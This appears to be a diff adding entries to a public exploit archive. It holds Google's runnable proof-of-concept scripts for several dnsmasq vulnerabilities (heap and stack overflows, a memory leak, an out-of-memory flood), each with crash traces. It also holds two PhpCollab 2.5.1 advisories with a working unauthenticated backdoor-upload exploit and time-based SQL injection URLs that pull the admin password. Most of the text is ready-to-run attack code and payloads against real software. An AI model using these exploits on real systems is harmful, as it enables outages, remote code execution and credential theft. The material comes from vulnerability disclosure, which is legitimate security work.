import socket
import struct
import sys
def dw(x):
return struct.pack('>H', x)
def udp_handler(sock_udp):
data, addr = sock_udp.recvfrom(1024)
print '[UDP] Total Data len recv ' + str(len(data))
id = struct.unpack('>H', data[0:2])[0]
query = data[12:]
data = dw(id) # id
data += dw(0x85a0) # flags
data += dw(1) # questions
data += dw(0x52) # answers
data += dw(0) # authoritative
data += dw(0) # additional
# Add the question back - we're just hardcoding it
data += ('\x03125\x018\x018\x018\x07in-addr\x04arpa\x00' +
'\x00\x0c' + # type = 'PTR'
'\x00\x01') # cls = 'IN'
# Add the first answer
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x04\x00' + # size of this resource record
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x0e' + 'Z'*14 +
'\x00')
# Add the next answer, which is written out in full
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x00\x26' + # size of this resource record
'\x08DCBBEEEE\x04DDDD\x08CCCCCCCC\x04AAAA\x04BBBB\x03com\x00')
for _ in range(79):
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x00\x02' + # size of the compressed resource record
'\xc4\x40') # pointer to the second record's name
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x00\x11' + # size of this resource record
'\x04EEEE\x09DAABBEEEE\xc4\x49')
sock_udp.sendto(data, addr)
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>\n' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_udp.bind((ip, port))
print 'Listening at %s:%d\n' % (ip, port)
while True:
udp_handler(sock_udp)
sock_udp.close()

145
platforms/multiple/dos/42942.py Executable file
View file

@ -0,0 +1,145 @@
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14492.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open two terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
2) On one terminal start dnsmasq:
# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff --enable-ra
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
dnsmasq-dhcp: router advertisement on fd00::
dnsmasq-dhcp: IPv6 router advertisement enabled
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 7 addresses
3) On another terminal start the PoC:
# python /poc.py ::1 547
[+] sending 2050 bytes to ::1
4) Dnsmasq will output the following: Segmentation fault (core dumped)
==556==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000ea81 at pc 0x00000049628a bp 0x7ffd60a28a20 sp 0x7ffd60a281d0
WRITE of size 4 at 0x61900000ea81 thread T0
#0 0x496289 in __interceptor_vsprintf (/test/dnsmasq/src/dnsmasq+0x496289)
#1 0x4964d2 in __interceptor_sprintf (/test/dnsmasq/src/dnsmasq+0x4964d2)
#2 0x519538 in print_mac /test/dnsmasq/src/util.c:593:12
#3 0x586e6a in icmp6_packet /test/dnsmasq/src/radv.c:201:4
#4 0x544af4 in main /test/dnsmasq/src/dnsmasq.c:1064:2
#5 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x61900000ea81 is located 0 bytes to the right of 1025-byte region [0x61900000e680,0x61900000ea81)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x51cb14 in read_opts /test/dnsmasq/src/option.c:4615:16
#3 0x541783 in main /test/dnsmasq/src/dnsmasq.c:89:3
#4 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x496289) in __interceptor_vsprintf
Shadow bytes around the buggy address:
0x0c327fff9d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff9d50:[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==556==ABORTING
'''
#!/usr/bin/env python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from struct import pack
import socket
import sys
ND_ROUTER_SOLICIT = 133
ICMP6_OPT_SOURCE_MAC = 1
def u8(x):
return pack("B", x)
def send_packet(data, host):
print("[+] sending {} bytes to {}".format(len(data), host))
s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, 0)) != len(data):
print("[!] Could not send (full) payload")
s.close()
if __name__ == '__main__':
assert len(sys.argv) == 2, "Run via {} <IPv6>".format(sys.argv[0])
host, = sys.argv[1:]
pkg = b"".join([
u8(ND_ROUTER_SOLICIT), # type
u8(0), # code
b"X" * 2, # checksum
b"\x00" * 4, # reserved
u8(ICMP6_OPT_SOURCE_MAC), # hey there, have our mac
u8(255), # Have 255 MACs!
b"A" * 255 * 8,
])
send_packet(pkg, host)

151
platforms/multiple/dos/42943.py Executable file
View file

@ -0,0 +1,151 @@
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open two terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
2) On one terminal start dnsmasq:
# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 7 addresses
3) On another terminal start the PoC:
# python /poc.py ::1 547
[+] sending 70 bytes to ::1:547
4) Dnsmasq will output the following: Segmentation fault (core dumped)
==33==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcbef81470 at pc 0x0000004b5408 bp 0x7ffcbef81290 sp 0x7ffcbef80a40
WRITE of size 30 at 0x7ffcbef81470 thread T0
#0 0x4b5407 in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b5407)
#1 0x575d38 in dhcp6_maybe_relay /test/dnsmasq/src/rfc3315.c:211:7
#2 0x575378 in dhcp6_reply /test/dnsmasq/src/rfc3315.c:103:7
#3 0x571080 in dhcp6_packet /test/dnsmasq/src/dhcp6.c:233:14
#4 0x544a82 in main /test/dnsmasq/src/dnsmasq.c:1061:2
#5 0x7f93e5da62b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
Address 0x7ffcbef81470 is located in stack of thread T0 at offset 208 in frame
#0 0x57507f in dhcp6_reply /test/dnsmasq/src/rfc3315.c:78
This frame has 1 object(s):
[32, 208) 'state' <== Memory access at offset 208 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x4b5407) in __asan_memcpy
Shadow bytes around the buggy address:
0x100017de8230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8260: f1 f1 f1 f1 00 00 f3 f3 00 00 00 00 00 00 00 00
0x100017de8270: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00
=>0x100017de8280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f3]f3
0x100017de8290: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
0x100017de82a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de82b0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x100017de82c0: 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2
0x100017de82d0: 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==33==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from struct import pack
import sys
import socket
def send_packet(data, host, port):
print("[+] sending {} bytes to {}:{}".format(len(data), host, port))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, port)) != len(data):
print("[!] Could not send (full) payload")
s.close()
def u8(x):
return pack("B", x)
def u16(x):
return pack("!H", x)
def gen_option(option, data, length=None):
if length is None:
length = len(data)
return b"".join([
u16(option),
u16(length),
data
])
if __name__ == '__main__':
assert len(sys.argv) == 3, "{} <ip> <port>".format(sys.argv[0])
pkg = b"".join([
u8(12), # DHCP6RELAYFORW
u16(0x0313), u8(0x37), # transaction ID
b"_" * (34 - 4),
# Option 79 = OPTION6_CLIENT_MAC
# Moves argument into char[DHCP_CHADDR_MAX], DHCP_CHADDR_MAX = 16
gen_option(79, "A" * 74 + pack("<Q", 0x1337DEADBEEF)),
])
host, port = sys.argv[1:]
send_packet(pkg, host, int(port))

108
platforms/multiple/dos/42944.py Executable file
View file

@ -0,0 +1,108 @@
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
Sadly, there are no easy docker setup instructions available.
Setup a simple network with dnsmasq as dhcpv6 server. Run any dhcpv6 client on the clients machine and obtain the network packets. Look for the server identifier inside the dhcpv6 packets. Then, run the poc on the client:
# python /poc.py <ipv6 addr> <server id, hexencoded>
The poc will create a response.bin file with 32k bytes worth of ram, beginning at the buffer + 38.
'''
#!/usr/bin/env python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from binascii import unhexlify
from struct import pack
import socket
import sys
# num bytes to leak. < 0xFFFF, exact upper limit not tested.
N_BYTES = 0x8000
def send_packet(data, host, port):
print("[+] sending {} bytes to [{}]:{}".format(len(data), host, port))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, port)) != len(data):
print("[!] Could not send (full) payload")
s.close()
def u8(x):
return pack("B", x)
def u16(x):
return pack("!H", x)
def gen_option(option, data, length=None):
if length is None:
length = len(data)
return b"".join([
u16(option),
u16(length),
data
])
def inner_pkg(duid):
OPTION6_SERVER_ID = 2
return b"".join([
u8(5), # Type = DHCP6RENEW
u8(0), u16(1337), # ID
gen_option(OPTION6_SERVER_ID, duid),
gen_option(1, "", length=(N_BYTES - 8 - 18)) # Client ID
])
if __name__ == '__main__':
assert len(sys.argv) == 2, "{} <ip> <duid>".format(sys.argv[0])
# No automated way to obtain a duid, sorry. Not a programming contest after all.
host, duid = sys.argv[1:]
duid = unhexlify(duid)
assert len(duid) == 14
pkg = b"".join([
u8(12), # DHCP6RELAYFORW
'?',
# Client addr
'\xFD\x00',
'\x00\x00' * 6,
'\x00\x05',
'_' * (33 - 17), # Skip random data.
# Option 9 - OPTION6_RELAY_MSG
gen_option(9, inner_pkg(duid), length=N_BYTES),
])
# Setup receiving port
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, N_BYTES)
s.bind(('::', 547))
# Send request
send_packet(pkg, host, 547)
# Dump response
with open('response.bin', 'wb') as f:
f.write(s.recvfrom(N_BYTES)[0])

61
platforms/multiple/dos/42945.py Executable file
View file

@ -0,0 +1,61 @@
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwin <gynvael@google.com>
# Ron Bowes - Xoogler :/
import socket
import sys
def oom():
data = '''01 0d 08 1b 00 01 00 00 00 00 00 02 00 00 29 04
00 00 29 00 00 00 03 00 00 01 13 00 08 01 13 79
00 00 00 00 00
'''.replace(' ', '').replace('\n', '').decode('hex')
data = data.replace('\x00\x01\x13\x00', '\x7f\x00\x00\x01')
return data
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
packet = oom()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
while True:
s.sendto(packet, (ip, port))
#break
s.close()

99
platforms/multiple/dos/42946.py Executable file
View file

@ -0,0 +1,99 @@
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.
=================================================================
==2215==ERROR: AddressSanitizer: negative-size-param: (size=-4)
#0 0x4b55be in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b55be)
#1 0x59a70e in add_pseudoheader /test/dnsmasq/src/edns0.c:164:8
#2 0x59bae8 in add_edns0_config /test/dnsmasq/src/edns0.c:424:12
#3 0x530b6b in forward_query /test/dnsmasq/src/forward.c:407:20
#4 0x534699 in receive_query /test/dnsmasq/src/forward.c:1448:16
#5 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
#6 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
#7 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#8 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x62200001ca2e is located 302 bytes inside of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
#3 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: negative-size-param (/test/dnsmasq/src/dnsmasq+0x4b55be) in __asan_memcpy
==2215==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwin <gynvael@google.com>
# Ron Bowes - Xoogler :/
import socket
import sys
def negative_size_param():
data = '''00 00 00 00 00 00 00 00 00 00 00 04
00 00 29 00 00 3a 00 00 00 01 13 fe 32 01 13 79
00 00 00 00 00 00 00 01 00 00 00 61 00 08 08 08
08 08 08 08 08 08 08 08 08 08 08 00 00 00 00 00
00 00 00 6f 29 fb ff ff ff 00 00 00 00 00 00 00
00 00 03 00 00 00 00 00 00 00 00 02 8d 00 00 00
f9 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00
01 ff ff 00 35 13 01 0d 06 1b 00 00 00 00 00 00
00 00 00 00 00 04 00 00 29 00 00 3a 00 00 00 01
13 00 08 01 00 00 00 00 00 00 01 00 00 00 61 00
08 08 08 08 08 08 08 08 08 13 08 08 08 00 00 00
00 00 00 00 00 00 6f 29 fb ff ff ff 00 29 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 02 8d 00 00 00 f9 00 00 00 00 00 00 00 00
00 00 00 00 00 01 00 00 00 00 00 00 01 ff ff 00
35 13 00 00 00 00 00 b6 00 00 13 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 05
01 20 00 01
'''.replace(' ', '').replace('\n', '').decode('hex')
return data
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
packet = negative_size_param()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
s.sendto(packet, (ip, port))
s.close()

123
platforms/php/webapps/42934.txt Executable file
View file

@ -0,0 +1,123 @@
# [CVE-2017-6090] PhpCollab 2.5.1 Arbitrary File Upload (unauthenticated)
## Description
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
## Arbitrary File Upload
The phpCollab code does not correctly filter uploaded file contents. An unauthenticated attacker may upload and execute arbitrary code.
**CVE ID**: CVE-2017-6090
**Access Vector**: remote
**Security Risk**: Critical
**Vulnerability**: CWE-434
**CVSS Base Score**: 10 (Critical)
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept
The following HTTP request allows an attacker to upload a malicious php file, without authentication.
Thus, a file named after `$id.extension` is created.
For example, a backdoor file can be reached at `http://phpCollab.lan/logos_clients/1.php`.
```
POST /clients/editclient.php?id=1&action=update HTTP/1.1
Host: phpCollab.lan
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
Content-Length: 252
-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="backdoor.php"
Content-Type: application/x-php
<?php phpinfo(); ?>
-----------------------------154934846911423734231554128137--
```
### Vulnerable code
The vulnerable code is found in `clients/editclient.php`, line 63.
```
$extension = strtolower( substr( strrchr($_FILES['upload']['name'], ".") ,1) );
if(@move_uploaded_file($_FILES['upload']['tmp_name'], "../logos_clients/".$id.".$extension"))
{
chmod("../logos_clients/".$id.".$extension",0666);
$tmpquery = "UPDATE ".$tableCollab["organizations"]." SET extension_logo='$extension' WHERE id='$id'";
connectSql("$tmpquery");
}
```
### Exploit code
```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import requests
if __name__ == '__main__':
if (len(sys.argv) != 4):
print("Enter your target, userid and path for file upload like : python exploit.py http://www.phpCollabURL.lan 1 /tmp/test.php")
sys.exit(1)
target = "%s/clients/editclient.php?id=%s&action=update" % (sys.argv[1], sys.argv[2])
print("[*] Trying to exploit with URL : %s..." % target)
backdoor = {'upload': open(sys.argv[3], 'rb')}
r = requests.post(target, files=backdoor)
extension = os.path.splitext(sys.argv[3])[1]
link = "%s/logos_clients/%s%s" % (sys.argv[1], sys.argv[2], extension )
r = requests.get(link)
if r.status_code == 200:
print("[OK] Backdoor link : %s" % link)
else:
print("[FAIL]Problem (status:%s) (link:%s)" % (r.status_code, link))
```
## Solution
Update to the latest version avalaible.
## Affected versions
* Version <= 2.5.1
## Timeline (dd/mm/yyyy)
* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab ask to wait before publish.
* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream

120
platforms/php/webapps/42935.txt Executable file
View file

@ -0,0 +1,120 @@
# [CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated)
## Description
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
## SQL injections
The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code execution by an unauthenticated user.
**CVE ID**: CVE-2017-6089
**Access Vector**: remote
**Security Risk**: Critical
**Vulnerability**: CWE-89
**CVSS Base Score**: 10 (Critical)
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H
## Proof of Concept 1
The following HTTP request allows an attacker to extract data using SQL injections in either the `project` or `id` parameter (it requires at least one topic):
```
http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2
http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))
```
### Vulnerable code
The vulnerable code is found in `topics/deletetopics.php`, line 9.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id";
$tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id";
$pieces = explode(",",$id);
$num = count($pieces);
connectSql("$tmpquery1");
connectSql("$tmpquery2");
```
## Proof of Concept 2
The following HTTP request allows an attacker to extract data using SQL injections in the `id` parameter (it requires at least one saved bookmark):
```
http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```
### Vulnerable code
The vulnerable code is found in `bookmarks/deletebookmarks.php`, line 32.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)";
connectSql("$tmpquery1");
```
## Proof of Concept 3
The following HTTP request allows an attacker to extract some information using SQL injection in the `id` parameter (it requires at least one calendar entry):
```
http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```
### Vulnerable code
The vulnerable code is found in `calendar/deletecalendar.php`, line 31.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)";
connectSql("$tmpquery1");
```
**Notes**
The application probably needs a security posture against injections, so other parameters and pages may be vulnerables. This advisory does not intend to be an exhaustive list of vulnerable parameters.
## Solution
Update to the latest version avalaible.
## Affected versions
